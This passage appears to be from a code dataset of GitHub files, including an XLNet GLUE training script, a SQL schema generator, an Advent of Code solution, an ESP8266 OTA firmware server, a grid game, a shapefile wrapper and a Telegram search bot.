logging.FileHandler('log_{0}.txt'.format(args.task_name))\nhandler.setLevel(logging.INFO)\nhandler2 = logging.StreamHandler()\nhandler2.setLevel(logging.INFO)\nformatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nhandler2.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.addHandler(handler2)\nlogging.info(args)\n\nlog_interval = args.log_interval * args.accumulate if args.accumulate else args.log_interval\n\nif args.accumulate:\n logging.info('Using gradient accumulation. Effective batch size = ' \\\n 'batch_size * accumulate = %d', args.accumulate * args.batch_size)\n\n# random seed\nnp.random.seed(args.seed)\nrandom.seed(args.seed)\nmx.random.seed(args.seed)\n\nnum_workers = 0\nctxs = [mx.cpu(0)] if not args.gpu else [mx.gpu(i) for i in range(args.gpu)]\n\ntask = tasks[args.task_name]\n\n# model and loss\nif args.only_inference and not args.model_parameters:\n warnings.warn('model_parameters is not set. 
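The bucketing/padding pipeline above exists to keep padding waste low: `FixedBucketSampler` groups sequences of similar length, and `Pad` fills each batch to its own maximum, optionally rounded up to a multiple of `round_to` for tensor cores. A framework-free sketch of that padding step:

```python
import numpy as np

def pad_batch(seqs, pad_val=0, round_to=None):
    max_len = max(len(s) for s in seqs)
    if round_to:
        max_len = -(-max_len // round_to) * round_to   # ceil to a multiple
    out = np.full((len(seqs), max_len), pad_val, dtype=np.int64)
    for i, s in enumerate(seqs):
        out[i, :len(s)] = s
    return out

print(pad_batch([[1, 2, 3], [4]], round_to=8).shape)   # (2, 8)
```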
'\n 'Randomly initialized model will be used for inference.')\n\nget_pretrained = True\n\nget_model_params = {\n 'name': args.model_name,\n 'dataset_name': args.dataset,\n 'pretrained': get_pretrained,\n 'ctx': ctxs,\n 'use_decoder': False,\n 'dropout': args.dropout,\n 'attention_dropout': args.attention_dropout\n}\n\nxlnet_base, vocab, tokenizer = model.get_model(**get_model_params)\n# initialize the rest of the parameters\ninitializer = mx.init.Normal(0.02)\n\ndo_regression = not task.class_labels\nif do_regression:\n num_classes = 1\n loss_function = gluon.loss.L2Loss()\nelse:\n num_classes = len(task.class_labels)\n loss_function = gluon.loss.SoftmaxCELoss()\n# reuse the XLnetClassifier class with num_classes=1 for regression\nmodel = XLNetClassifier(xlnet_base,\n units=xlnet_base._net._units,\n dropout=0.1,\n num_classes=num_classes)\n\nnum_ctxes = len(ctxs)\n\n# initialize classifier\nif not args.model_parameters:\n model.classifier.initialize(init=initializer, ctx=ctxs)\n model.pooler.initialize(init=initializer, ctx=ctxs)\n\n# load checkpointing\noutput_dir = args.output_dir\n\nif args.model_parameters:\n logging.info('loading model params from %s', args.model_parameters)\n nlp.utils.load_parameters(model,\n args.model_parameters,\n ctx=ctxs,\n cast_dtype=True)\n\nnlp.utils.mkdir(output_dir)\n\nlogging.debug(model)\nmodel.hybridize(static_alloc=True)\nloss_function.hybridize(static_alloc=True)\n\nlogging.info('processing dataset...')\ntrain_data, dev_data_list, test_data_list, num_train_examples = preprocess_data(\n tokenizer, task, args.batch_size, args.dev_batch_size, args.max_len, vocab)\n\n\ndef test(loader_test, segment):\n \"\"\"Inference function on the test dataset.\"\"\"\n logging.info('Now we are doing testing on %s with %s.', segment, ctxs)\n\n tic = time.time()\n results = []\n for _, seqs in enumerate(loader_test):\n #input_ids, valid_length, segment_ids = seqs\n data_list = list(split_and_load(seqs, ctxs))\n out_list = []\n for splited_data in data_list:\n input_ids, valid_length, segment_ids = splited_data\n out = model(input_ids, segment_ids, valid_length=valid_length)\n out_list.append(out)\n out_list = np.vstack([o.asnumpy() for o in out_list])\n if not task.class_labels:\n # regression task\n for result in out_list.reshape(-1).tolist():\n results.append('{:.3f}'.format(result))\n else:\n # classification task\n out = out_list.reshape(-1, out_list.shape[-1])\n indices = out.argmax(axis=-1)\n for index in indices:\n results.append(task.class_labels[int(index)])\n\n mx.nd.waitall()\n toc = time.time()\n logging.info('Time cost=%.2fs, throughput=%.2f samples/s', toc - tic,\n args.dev_batch_size * len(loader_test) / (toc - tic))\n # write result to a file.\n segment = segment.replace('_mismatched', '-mm')\n segment = segment.replace('_matched', '-m')\n segment = segment.replace('SST', 'SST-2')\n filename = args.task_name + segment.replace('test', '') + '.tsv'\n test_path = os.path.join(args.output_dir, filename)\n with io.open(test_path, 'w', encoding='utf-8') as f:\n f.write(u'index\\tprediction\\n')\n for i, pred in enumerate(results):\n f.write(u'%d\\t%s\\n' % (i, str(pred)))\n\n\ndef log_metric(metric, is_training=True):\n prefix = 'training' if is_training else 'validation'\n metric_nm, metric_val = metric.get()\n if not isinstance(metric_nm, list):\n metric_nm, metric_val = [metric_nm], [metric_val]\n logging_str = prefix + ' metrics:' + ','.join(\n [i + ':%.4f' for i in metric_nm])\n logging.info(logging_str, *metric_val)\n return metric_nm, metric_val\n\n\ndef 
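`test()` above finishes by writing a GLUE-style submission file; the format is just a header line followed by tab-separated index/prediction rows, sketched here as a standalone helper:

```python
import io

def write_predictions(path, predictions):
    # GLUE submission format: header, then "<index>\t<label>" per example
    with io.open(path, 'w', encoding='utf-8') as f:
        f.write(u'index\tprediction\n')
        for i, pred in enumerate(predictions):
            f.write(u'%d\t%s\n' % (i, str(pred)))

write_predictions('MRPC.tsv', ['1', '0', '1'])
```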
log_train(batch_id, batch_num, step_loss, _log_interval, epoch_id,\n learning_rate):\n \"\"\"Generate and print out the log message for training. \"\"\"\n train_str = '[Epoch %d Batch %d/%d] loss=%.4f, lr=%.7f'\n logging.info(train_str, epoch_id + 1, batch_id + 1, batch_num,\n step_loss / _log_interval, learning_rate)\n\n\ndef log_eval(batch_id, batch_num, step_loss, _log_interval):\n \"\"\"Generate and print out the log message for inference. \"\"\"\n eval_str = '[Batch %d/%d] loss=%.4f'\n logging.info(eval_str, batch_id + 1, batch_num, step_loss / _log_interval)\n\n\ndef train(metric):\n \"\"\"Training function.\"\"\"\n if not args.only_inference:\n logging.info('Now we are doing XLNet classification training on %s!',\n ctxs)\n\n all_model_params = model.collect_params()\n optimizer_params = {\n 'learning_rate': args.lr,\n 'epsilon': args.epsilon,\n 'wd': 0\n }\n trainer = gluon.Trainer(all_model_params,\n args.optimizer,\n optimizer_params,\n update_on_kvstore=False)\n\n step_size = args.batch_size * args.accumulate if args.accumulate else args.batch_size\n num_train_steps = int(num_train_examples / step_size * args.epochs)\n epoch_number = args.epochs\n if args.training_steps:\n num_train_steps = args.training_steps\n epoch_number = 9999\n logging.info('training steps=%d', num_train_steps)\n warmup_ratio = args.warmup_ratio\n num_warmup_steps = int(num_train_steps * warmup_ratio)\n step_num = 0\n\n # Do not apply weight decay on LayerNorm and bias terms\n for _, v in model.collect_params('.*beta|.*gamma|.*bias').items():\n v.wd_mult = 0.0\n # Collect differentiable parameters\n params = [p for p in all_model_params.values() if p.grad_req != 'null']\n\n # Set grad_req if gradient accumulation is required\n if args.accumulate and args.accumulate > 1:\n for p in params:\n p.grad_req = 'add'\n # track best eval score\n metric_history = []\n best_metric = None\n patience = args.early_stop\n\n tic = time.time()\n finish_flag = False\n for epoch_id in range(epoch_number):\n if args.early_stop and patience == 0:\n logging.info('Early stopping at epoch %d', epoch_id)\n break\n if finish_flag:\n break\n if not args.only_inference:\n metric.reset()\n step_loss = 0\n tic = time.time()\n all_model_params.zero_grad()\n for batch_id, seqs in enumerate(train_data):\n new_lr = args.lr\n # learning rate schedule\n if step_num < num_warmup_steps:\n new_lr = args.lr * step_num / num_warmup_steps\n elif args.lr_decay == 'linear':\n non_warmup_steps = step_num - num_warmup_steps\n offset = non_warmup_steps / (num_train_steps -\n num_warmup_steps)\n new_lr = max(0, args.lr - offset * args.lr)\n trainer.set_learning_rate(new_lr)\n batch_loss = []\n # forward and backward\n with mx.autograd.record():\n data_list = list(split_and_load(seqs, ctxs))\n for splited_data in data_list:\n input_ids, valid_length, segment_ids, label = splited_data\n out = model(input_ids,\n segment_ids,\n valid_length=valid_length)\n ls = loss_function(out, label).mean() / len(ctxs)\n batch_loss.append(ls)\n if args.accumulate:\n ls = ls / args.accumulate\n ls.backward()\n # update\n if not args.accumulate or (batch_id +\n 1) % args.accumulate == 0:\n trainer.allreduce_grads()\n nlp.utils.clip_grad_global_norm(params, 1)\n trainer.update(args.accumulate if args.accumulate else 1,\n ignore_stale_grad=True)\n step_num += 1\n if args.accumulate and args.accumulate > 1:\n # set grad to zero for gradient accumulation\n all_model_params.zero_grad()\n if batch_id == 0 and epoch_id == 0:\n toc = time.time()\n logging.info(\n 'Time cost for the 
first forward-backward =%.2fs',\n toc - tic)\n batch_loss = sum([ls.asscalar() for ls in batch_loss])\n step_loss += batch_loss\n if (batch_id + 1) % (args.log_interval) == 0:\n log_train(batch_id, len(train_data), step_loss,\n args.log_interval, epoch_id,\n trainer.learning_rate)\n step_loss = 0\n if step_num >= num_train_steps:\n logging.info('Finish training step: %d', step_num)\n finish_flag = True\n break\n\n mx.nd.waitall()\n\n # inference on dev data\n for segment, dev_data in dev_data_list:\n metric_nm, metric_val = evaluate(dev_data, metric, segment)\n if best_metric is None or metric_val >= best_metric:\n best_metric = metric_val\n patience = args.early_stop\n else:\n if args.early_stop is not None:\n patience -= 1\n metric_history.append((epoch_id, metric_nm, metric_val))\n\n if not args.only_inference:\n # save params\n ckpt_name = 'model_xlnet_{0}_{1}.params'.format(\n args.task_name, epoch_id)\n params_saved = os.path.join(output_dir, ckpt_name)\n nlp.utils.save_parameters(model, params_saved)\n logging.info('params saved in: %s', params_saved)\n toc = time.time()\n logging.info('Time cost=%.2fs', toc - tic)\n tic = toc\n\n if not args.only_inference:\n # we choose the best model based on metric[0],\n # assuming higher score stands for better model quality\n metric_history.sort(key=lambda x: x[2][0], reverse=True)\n epoch_id, metric_nm, metric_val = metric_history[0]\n ckpt_name = 'model_xlnet_{0}_{1}.params'.format(\n args.task_name, epoch_id)\n params_saved = os.path.join(output_dir, ckpt_name)\n nlp.utils.load_parameters(model, params_saved)\n metric_str = 'Best model at epoch {}. Validation metrics:'.format(\n epoch_id + 1)\n metric_str += ','.join([i + ':%.4f' for i in metric_nm])\n logging.info(metric_str, *metric_val)\n\n # inference on test data\n for segment, test_data in test_data_list:\n test(test_data, segment)\n print('finish test!')\n\n\ndef evaluate(loader_dev, metric, segment):\n \"\"\"Evaluate the model on validation dataset.\"\"\"\n logging.info('Now we are doing evaluation on %s with %s.', segment, ctxs)\n metric.reset()\n step_loss = 0\n tic = time.time()\n out_list = []\n label_list = []\n for batch_id, seqs in enumerate(loader_dev):\n batch_loss = []\n # forward and backward\n data_list = list(split_and_load(seqs, ctxs))\n for splited_data in data_list:\n input_ids, valid_length, segment_ids, label = splited_data\n out = model(input_ids, segment_ids, valid_length=valid_length)\n batch_loss.append(loss_function(out, label).mean() / len(ctxs))\n if not do_regression:\n label = label.reshape((-1))\n out_list.append(out.as_in_context(mx.cpu(0)))\n label_list.append(label.as_in_context(mx.cpu(0)))\n\n batch_loss = sum([ls.asscalar() for ls in batch_loss])\n step_loss += batch_loss\n if (batch_id + 1) % (args.log_interval) == 0:\n log_eval(batch_id, len(loader_dev), step_loss, args.log_interval)\n step_loss = 0\n\n label_list = mx.nd.concat(*label_list, dim=0)\n out_list = mx.nd.concat(*out_list, dim=0)\n metric.update([label_list], [out_list])\n metric_nm, metric_val = log_metric(metric, is_training=False)\n mx.nd.waitall()\n toc = time.time()\n logging.info('Time cost=%.2fs, throughput=%.2f samples/s', toc - tic,\n args.dev_batch_size * len(loader_dev) / (toc - tic))\n return metric_nm, metric_val\n\n\nif __name__ == '__main__':\n 
train(task.metrics)\n","repo_name":"UofT-EcoSystem/MXNet-GPU_Memory_Profiler","sub_path":"benchmarks/gluon-nlp/scripts/language_model/run_glue.py","file_name":"run_glue.py","file_ext":"py","file_size_in_byte":25933,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"71017118761","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport json\n\n\nupdate_column_sql = \"\"\"\n-- cast column {table}.{column} to {cast}\nBEGIN;\n alter table {table} rename column {column} to {column}_x;\n alter table {table} add column {column} {cast};\n update {table} set {column} = {column}_x::{cast};\n alter table {table} drop column {column}_x;\nCOMMIT;\n\"\"\"\n\nreplace_empty_sql = \"\"\"\n--- update empty values for {table}.{column}\nUPDATE {table} SET {column} = NULL WHERE {column} = '';\n\"\"\"\n\n\ndef update_column(table, column, cast):\n \"\"\"Cast the data in the column to the required data type.\"\"\"\n return update_column_sql.format(table=table, column=column, cast=cast)\n\n\ndef null(table, column):\n \"\"\"Set empty values in the column to NULL.\"\"\"\n return replace_empty_sql.format(table=table, column=column)\n\n\nif __name__ == '__main__':\n\n sql = []\n\n spec = json.load(open('schema.json', 'r'))\n tables_to_process = spec['process_tables']\n for table, task in spec['schema'].items():\n if table in tables_to_process:\n sql.append(\n \"\\n--============ {} ============--\\n\".format(table.upper()))\n for column in task.get('null', []):\n sql.append(null(table, column))\n for column, cast in sorted(task.get('convert', {}).items()):\n sql.append(update_column(table, column, cast))\n\n with open('update_schema.sql', 'w') as f:\n f.writelines(sql)\n","repo_name":"asyncee/fias2pgsql","sub_path":"update_schema.py","file_name":"update_schema.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"18"} +{"seq_id":"21506590694","text":"# Declaration of variables\ninstructions = []\n\n# Read input\nfile_obj = open('d2_input.txt', 'r')\nfor line in file_obj:\n instructions.append(line.strip())\nfile_obj.close()\n\n# Part one\n\n# 1 2 3\n# 4 5 6\n# 7 8 9\n\nkeypad = [[7, 8, 9],\n [4, 5, 6],\n [1, 2, 3]]\n\n# y 2\n# y 1 +\n# y 0 1 2\n# x x x\n\ncurPosX = 1\ncurPosY = 1\n\n# Part two\n\n# 1\n# 2 3 4\n# 5 6 7 8 9\n# A B C\n# D\n\np2keypad = [['x', 'x', 'D', 'x', 'x'],\n ['x', 'A', 'B', 'C', 'x'],\n [5, 6, 7, 8, 9],\n ['x', 2, 3, 4, 'x'],\n ['x', 'x', 1, 'x', 'x']]\n\n# y 4\n# y 3\n# y 2 +\n# y 1\n# y 0 1 2 3 4\n# x x x x x\n\np2curPosX = 2\np2curPosY = 2\n\ncode = \"\"\np2code = \"\"\n\nfor instruction in instructions:\n if instruction != \"\":\n for char in instruction:\n\n # Part one\n if (char.lower() == 'u' and curPosY < 2):\n curPosY = curPosY +1\n elif (char.lower() == 'd' and curPosY > 0):\n curPosY = curPosY -1\n elif (char.lower() == 'l' and curPosX > 0):\n curPosX = curPosX -1\n elif (char.lower() == 'r' and curPosX < 2):\n curPosX = curPosX +1\n\n # Part two\n if (char.lower() == 'u' and p2curPosY < 4 and p2keypad[p2curPosY+1][p2curPosX] != 'x'):\n p2curPosY = p2curPosY +1\n elif (char.lower() == 'd' and p2curPosY > 0 and p2keypad[p2curPosY-1][p2curPosX] != 'x'):\n p2curPosY = p2curPosY -1\n elif (char.lower() == 'r' and p2curPosX < 4 and p2keypad[p2curPosY][p2curPosX+1] != 'x'):\n p2curPosX = p2curPosX +1\n elif (char.lower() == 'l' and p2curPosX > 0 and p2keypad[p2curPosY][p2curPosX-1] != 'x'):\n p2curPosX = p2curPosX -1\n\n code = code + 
str(keypad[curPosY][curPosX])\n p2code = p2code + str(p2keypad[p2curPosY][p2curPosX])\nprint(\"The code for part one is: \" + code)\nprint(\"The code for part two is: \" + p2code)\n","repo_name":"anthorne/advent-of-code_2016","sub_path":"d2.py","file_name":"d2.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36370355090","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib import parse\nimport hashlib\nimport os\nimport sys\n\n# HTTPRequestHandler class\nclass RequestHandler(BaseHTTPRequestHandler):\n\n # GET\n def do_GET(self):\n parsed_path = parse.urlparse(self.path)\n print(parsed_path, self.path)\n\n m = hashlib.md5()\n try:\n with open('/tmp/{}{}'.format(build_dir, parsed_path.path), 'rb') as f:\n firmware = f.read()\n\n m.update(firmware);\n print('local firmware: ' + m.hexdigest())\n except:\n print(\"\"\"Can't load local firmware\"\"\")\n return\n\n\n for name, value in self.headers.items():\n #print(name, value)\n if name[:10] == 'x-ESP8266-':\n print(name[10:], '->', value)\n\n if self.headers.get('x-ESP8266-version') == m.hexdigest():\n self.send_response(304)\n return\n\n # Send response status code\n self.send_response(200)\n\n # Send headers\n self.send_header('Content-type','application/octet-stream')\n self.send_header('Content-Disposition','attachment; filename=firmware.ino')\n self.send_header('Content-Length', len(firmware))\n self.end_headers()\n\n self.wfile.write(firmware)\n return\n\nbuild_dir = \"\"\nfor d in os.listdir('/tmp'):\n if d[:14] == 'arduino_build_' and d > build_dir:\n build_dir = d\n\nif len(build_dir) == 0:\n print(\"\"\"Can't find Arduino Build Directory\"\"\")\n sys.exit(1)\n\nserver_address = ('0.0.0.0', 8888)\nhttpd = HTTPServer(server_address, RequestHandler)\nprint('running server...')\nhttpd.serve_forever()\n","repo_name":"guillier/Teleinfo_MQTT","sub_path":"ESP_OTA.py","file_name":"ESP_OTA.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"14302996581","text":"from Prey import Prey\nfrom Hunter import Hunter\nfrom Grid import Grid\nfrom random import randint\nfrom time import sleep\nimport os\n\ndef PreyExists(grid: Grid, prey: str):\n found = False\n \n for x, matrixI in enumerate(grid.matrix):\n for y, value in enumerate(matrixI):\n if value == prey:\n found = True\n\n return(found)\n\ndef printGrid(grid: Grid):\n os.system('cls')\n grid.printMatrix()\n\nif __name__ == \"__main__\":\n numberOfPreys = randint(5, 9)\n grid = Grid(7)\n \n hunter = Hunter(randint(0, grid.size - 1), randint(0, grid.size - 1))\n grid.insertElementInMatrix(hunter.x, hunter.y, hunter.element)\n listOfPreys = []\n for i in range(numberOfPreys):\n listOfPreys.append(\n Prey(randint(0, grid.size - 1), randint(0, grid.size - 1), str(i))\n )\n prey = listOfPreys[-1]\n grid.insertElementInMatrix(prey.x, prey.y, prey.preyID)\n \n printGrid(grid)\n sleep(1)\n\n while(len(listOfPreys) > 0):\n i+= 1\n for prey in listOfPreys:\n prey.move(grid)\n \n hunter.move(grid)\n \n for prey in listOfPreys:\n if not PreyExists(grid, prey.preyID):\n listOfPreys.remove(prey)\n \n printGrid(grid)\n sleep(1)\n","repo_name":"TheBestShadow/HunterPrey_AI","sub_path":"HunterAndPrey/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} 
+{"seq_id":"74806479400","text":"\"\"\"\n\nДомашнее задание №1\n\nУсловный оператор: Возраст\n\n* Попросить пользователя ввести возраст при помощи input и положить \n результат в переменную\n* Написать функцию, которая по возрасту определит, чем должен заниматься пользователь: \n учиться в детском саду, школе, ВУЗе или работать\n* Вызвать функцию, передав ей возраст пользователя и положить результат \n работы функции в переменную\n* Вывести содержимое переменной на экран\n\n\"\"\"\n\n\n\ndef main():\n\n while True:\n try:\n age = float(input('Введите свой возраст: '))\n break\n except ValueError:\n print(\"\\nВведите нормальный возраст!\\n\")\n\n \n if 3 <= age <= 6:\n \treturn \"Ваше место в детском саду\"\n elif 7 <= age <= 17:\n \treturn \"Ваше место в школе\"\n elif 18 <= age <= 22:\n \treturn \"Ваше место в ВУЗе\"\n elif 23 <= age <= 65:\n \treturn \"Ваше место на работе\"\n elif age == 0:\n return 'С ДР!'\n elif age < 0:\n return 'Не бывает отрицательного возраста'\n else:\n \treturn \"Вы слишком малы, либо пора на пенсию\"\n\nif __name__ == \"__main__\":\n my_age = main()\n print(my_age)","repo_name":"Abiotic/lesson2","sub_path":"1_if1.py","file_name":"1_if1.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18917659373","text":"from builtins import range\ntry:\n # Depending of the build options, this might be missing. Just skip \n # ShapeFile if we don't have this.\n # This has a deprecation warning for python 3.7 and GDAL 2.4.2. We can't do\n # anything about this, so silence the warning\n import warnings\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\",category=DeprecationWarning)\n import osgeo.ogr as ogr\n import osgeo.osr as osr\n have_shape_file = True\nexcept ImportError:\n have_shape_file = False\n\nimport os.path\nimport collections\nimport collections.abc\nimport weakref\n\nif(have_shape_file):\n class ShapeFile(collections.abc.Mapping):\n '''library OGR. You can see supported formats at \n http://gdal.org/ogr/ogr_formats.html. This only supports a subset of the\n available functions, but it gives a simpler interface. You can also just\n directly use data_source and layers[\"blah\"].layer which are \n ogr.DataSource and ogr.Layer'''\n\n # Need to add support for using as a \"with\" file\n def __init__(self, fname, mode = \"r\", driver_name = \"ESRI Shapefile\"):\n '''Open the given file, with the given mode. 
If you are writing, \n you can supply the driver name to use.'''\n # Shape files don't like being overwritten, so we remove any existing file first\n ext = os.path.splitext(fname)[1]\n if(mode == \"w\" and driver_name == \"ESRI Shapefile\" and\n ext == \".shp\" and os.path.exists(fname)):\n os.remove(fname)\n self.layers = {}\n if(mode == \"r\"):\n self.data_source = ogr.Open(fname)\n if(self.data_source is None):\n raise RuntimeError(\"Error opening file %s\" % fname)\n for i in range(self.data_source.GetLayerCount()):\n lay = ShapeLayer(self, i)\n self.layers[lay.name] = lay\n elif(mode == \"w\"):\n self.data_source = ogr.GetDriverByName(driver_name).CreateDataSource(fname)\n else:\n raise RuntimeError(\"Invalid mode %s\" % mode)\n\n @property\n def file_name(self):\n return self.data_source.GetName()\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n self.close()\n\n def __len__(self):\n return self.layers.__len__()\n\n def __iter__(self):\n return self.layers.__iter__()\n\n def __getitem__(self, key):\n return self.layers.__getitem__(key)\n\n def close(self):\n '''Close the file and write everything to disk'''\n if(self.data_source is not None):\n self.data_source.SyncToDisk()\n self.data_source = None\n\n def __del__(self):\n self.close()\n\n def add_layer(self, name, geometry_type, fields, spatial_reference = osr.SpatialReference(osr.GetUserInputAsWKT(\"WGS84\"))):\n '''Add a layer of the given geometry type with the given fields.\n\n For example:\n t.add_layer(\"out\", ogr.wkbPolygon,\n [[\"File\", ogr.OFTString, 100],\n [\"Row\", ogr.OFTInteger],])\n\n Each field has a name, type, optionally a width, and optionally a\n precision.\n\n You can specify the spatial reference, but the default is WGS84'''\n data_layer = self.data_source.CreateLayer(name, spatial_reference,\n geometry_type)\n for v in fields:\n f = ogr.FieldDefn(v[0], v[1])\n if(len(v) >= 3):\n f.SetWidth(v[2])\n if(len(v) >= 4):\n f.SetPrecision(v[3])\n data_layer.CreateField(f)\n lay = ShapeLayer(self, self.data_source.GetLayerCount() - 1)\n self.layers[lay.name] = lay\n return lay\n\n class ShapeLayer(collections.abc.Sequence):\n '''This class handles access to a single layer in a Shapefile.'''\n def __init__(self, shape_file, index):\n '''Create ShapeLayer for given ShapeFile and index. This isn't \n normally called directly, instead go through ShapeFile'''\n self.shape_file = weakref.proxy(shape_file)\n self.layer = self.shape_file.data_source.GetLayer(index)\n self.field_list = [self.layer.GetLayerDefn().GetFieldDefn(i).GetName() for i in range(self.layer.GetLayerDefn().GetFieldCount())]\n\n @property\n def name(self):\n return self.layer.GetName()\n\n @staticmethod\n def linear_ring_2d(v):\n '''Create a linear ring using 2d points. We pass in an array,\n with each entry in the array being an array of 2 values.'''\n g = ogr.Geometry(ogr.wkbLinearRing)\n for i in v:\n g.AddPoint_2D(*i)\n return g\n\n @staticmethod\n def polygon_2d(*v):\n '''Create a polygon using 2D points. A polygon has one exterior\n ring and zero or more interior rings. 
This gets passed as one or\n more arrays, with each array having arrays of 2 values.\n \n We close any rings passed in, so you don't have to give the closing\n point if you don't want to (although it doesn't hurt to do so).'''\n g = ogr.Geometry(ogr.wkbPolygon)\n for vf in v:\n gf = ShapeLayer.linear_ring_2d(vf)\n gf.CloseRings()\n g.AddGeometry(gf)\n return g\n\n @staticmethod\n def point_2d(x, y):\n '''Create a 2D point'''\n g = ogr.Geometry(ogr.wkbPoint)\n g.AddPoint_2D(x, y)\n return g\n\n def add_feature(self, d):\n '''Add a feature. We pass in a dictionary of keyword/value pairs. The \n keyword \"Geometry\" is used to set the geometry. You can optionally\n include a \"Style\" to pass in a style string.\n\n As a convenience, this returns this object, so you can add multiple \n features in a row'''\n f = ogr.Feature(self.layer.GetLayerDefn())\n for name, value in list(d.items()):\n if(name ==\"Geometry\"):\n f.SetGeometry(value)\n elif(name ==\"Style\"):\n f.SetStyleString(value)\n else:\n f.SetField(name, value)\n self.layer.CreateFeature(f)\n return self\n \n\n def set_filter_rect(self, x1, y1, x2, y2):\n '''Filter the features so only those that intersect the rectangle\n are returned. The x and y are given in whatever the spatial\n reference is for the layer, e.g., longitude and latitude\n (note the order, X is longitude)'''\n self.layer.SetSpatialFilterRect(x1, y1, x2, y2)\n\n def set_spatial_filter(self, ogr_geometry):\n '''Filter the features based on a spatial filter. The spatial filter \n should be an Ogr::Geometry, and we filter based on intersecting \n that geometry. Note that the special case of a rectangle filter is\n handled by set_filter_rect, which has an easier interface (although\n there is nothing wrong with creating a rectangle as an Ogr::Geometry\n and calling this function if desired.\n \n Note that you can additionally filter by attributes using \n set_attribute_filter.'''\n self.layer.SetSpatialFilter(ogr_geometry)\n\n def set_attribute_filter(self, where_clause):\n '''Filter the features based on an SQL where clause on the attributes.\n Note that this is in addition to any spatial filters, you can have\n both a spatial and an attribute filter at the same time.'''\n self.layer.SetAttributeFilter(where_clause)\n\n def clear_filter(self):\n '''Clear whatever filters have been set.'''\n self.layer.SetSpatialFilter(None)\n self.layer.SetAttributeFilter(None)\n\n def geometry_collection(self):\n '''Return the geometry union of all the features. 
This is useful for \n example if this layer is a POI list and we are finding the intersection\n with a footprint layer.'''\n gcol = ogr.Geometry(ogr.wkbGeometryCollection)\n for ft in self:\n gcol.AddGeometry(ft[\"Geometry\"])\n return gcol\n\n def __getitem__(self, index):\n if(index < 0 or index >= len(self)):\n raise IndexError\n self.layer.SetNextByIndex(index)\n return ShapeFeature(self, self.layer.GetNextFeature())\n\n def __len__(self):\n return self.layer.GetFeatureCount()\n \n\nclass ShapeFeature(collections.abc.Mapping):\n '''This handles a Feature in a Layer.'''\n def __init__(self, shape_layer, ogr_feature):\n self.layer = weakref.proxy(shape_layer)\n self.feature = ogr_feature\n\n def keys(self):\n res = [\"Geometry\"]\n res.extend(self.layer.field_list)\n return res\n\n def __iter__(self):\n for k in list(self.keys()):\n yield k\n return\n\n def __len__(self):\n return 1 + len(self.layer.field_list)\n\n def __getitem__(self, key):\n if(key == \"Geometry\"):\n return self.feature.GetGeometryRef()\n else:\n ind = self.feature.GetFieldIndex(key)\n if(ind < 0):\n raise KeyError(key)\n return self.feature.GetField(ind)\n\nif(have_shape_file):\n __all__ = [\"ShapeFile\", \"ShapeLayer\", \"ShapeFeature\", \"have_shape_file\"]\nelse:\n __all__ = [\"have_shape_file\"]\n","repo_name":"Cartography-jpl/geocal","sub_path":"python/lib/shape_file.py","file_name":"shape_file.py","file_ext":"py","file_size_in_byte":9143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5243770769","text":"from datetime import datetime\nimport logging\nimport time\nimport traceback\n\nfrom django.core.management.base import BaseCommand\nfrom channelguide.channels.models import Channel\nfrom channelguide.channels.management import utils\n\nclass Command(BaseCommand):\n\n def handle(self, **kwargs):\n \"\"\"Update the items for each channel.\"\"\"\n utils.set_short_socket_timeout()\n now = datetime.now()\n def callback(channel):\n if channel.state == Channel.SUSPENDED and now.weekday() != 6:\n # only check suspended feeds on Sunday\n return\n if not channel.is_approved() and \\\n channel.state != Channel.SUSPENDED:\n # only check approved/suspended feeds\n return\n if channel.id % 24 != now.hour:\n # check channels throughout the day, some each hour\n return\n try:\n start = time.time()\n channel.update_items()\n length = time.time() - start\n if length > 6:\n logging.warn(\"Update too slow for %s: %f\" % (channel.url,\n length))\n except:\n logging.warn(\"\\nError updating items for %s\\n\\n%s\\n\" %\n (channel, traceback.format_exc()))\n utils.spawn_threads_for_channels('updating items', callback, 4)\n","repo_name":"kmshi/miroguide","sub_path":"channelguide/channels/management/commands/update_items.py","file_name":"update_items.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"27343783193","text":"# logging configuration\nimport logging\n\nfrom pyrogram import Client as app\nfrom pyrogram.types import Message\nfrom youtube_search import YoutubeSearch\n\nlogging.basicConfig(\n level=logging.DEBUG, format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n)\nlogger = logging.getLogger(__name__)\n\nimport pyrogram\n\nlogging.getLogger(\"pyrogram\").setLevel(logging.WARNING)\n\n\n@app.on_message(pyrogram.filters.command([\"بحث\"]))\nasync def ytsearch(_, message: Message):\n try:\n if len(message.command) < 2:\n await 
